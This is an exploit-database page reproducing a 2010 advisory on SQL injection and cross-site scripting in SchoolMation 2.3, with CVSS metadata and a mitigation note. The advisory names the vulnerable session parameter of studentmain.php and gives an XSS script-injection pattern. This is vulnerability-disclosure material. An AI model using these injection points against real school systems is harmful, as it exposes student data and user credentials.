header-logo
Suggest Exploit
vendor:
SchoolMation
by:
Sid3^effects aKa HaRi
8,3
CVSS
HIGH
SQL Injection and XSS
89
CWE
Product Name: SchoolMation
Affected Version From: 2.3
Affected Version To: 2.3
Patch Exists: Yes
Related CWE: N/A
CPE: a:schoolmation:schoolmation:2.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux,Windows
2010

SchoolMation Version 2.3 SQLi and XSS Vulnerability

SchoolMation Version 2.3 is vulnerable to SQL injection and XSS attacks. An attacker can gain access to the database and modify or delete data. An attacker can also inject malicious code into the application, which can be used to steal user credentials or other sensitive information.

Mitigation:

The vendor has released a patch to address the vulnerability. Additionally, users should ensure that all input is properly sanitized and validated before being used in an SQL query.
Source

Exploit-DB raw data:

        ====================================================
         SchoolMation Version 2.3 SQLi and XSS Vulnerability
        ====================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1               ##########################################             1
0               I'm Sid3^effects member from Inj3ct0r Team             1
1               ##########################################             0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Name :  SchoolMation Version 2.3 SQLi and XSS Vulnerability
Date : june, 9 2010
Vendor url :http://www.schoolmation.com/
Platform: Linux,Windows
Price: AUD$450
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_
greetz to :All ICW members.

###############################################################################################################
Description:


# Ability for manager to configure dates for terms.

# Quick date search system added by clicking on the term you want to search within.

# Configurable search levels for the teacher section. i.e restrict searches to either only students, students and teachers or students, teachers and administrators.

# Greatly enhanced Student section. Standardized tests, Activities,Awards, Grades and Attendance added to the area.

# Searching grades now averages the percentage results. - you can use this to find average marks of students during a term.

# Graphs now work using the date search information

# Financial system added that has the abilty to compute total amount paid and owed by a search group. The financial system also has the ability to print pdf invoices.
###############################################################################################################

Xploit: SQLi Vulnerability

DEMO  URL :http://server/schoolmv2/html/studentmain.php?session=[sqli]

###############################################################################################################
Xploit: XSS Vulnerability

  Attack Pattern: '"--><script>alert(0x000872)</script>

  http://server/demo/schoolmv2/html/studentmain.php?session=[XSS]


###############################################################################################################
# 0day no more 
# Sid3^effects

Navigation

Suggest Exploit

Services By CQR